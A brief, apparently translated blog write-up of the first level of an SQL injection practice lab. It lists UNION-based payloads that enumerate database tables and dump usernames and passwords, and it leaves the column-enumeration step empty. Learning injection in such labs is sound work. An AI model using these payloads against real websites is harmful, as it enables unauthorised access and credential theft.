LESS-1

 Burst table payload

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Found in emails, referers, uagents, users, apparently users are user data table

 

Burst column name (field) payload

 

 Explosive payload value

?id=0' union select 1,2,group_concat(username,0x3a,password) from users--+

0x3a: 0x are hexadecimal flag, 3a decimal 58, in an ascii ':' for dividing pasword and username.

Guess you like

Origin www.cnblogs.com/lql1440825777/p/12180544.html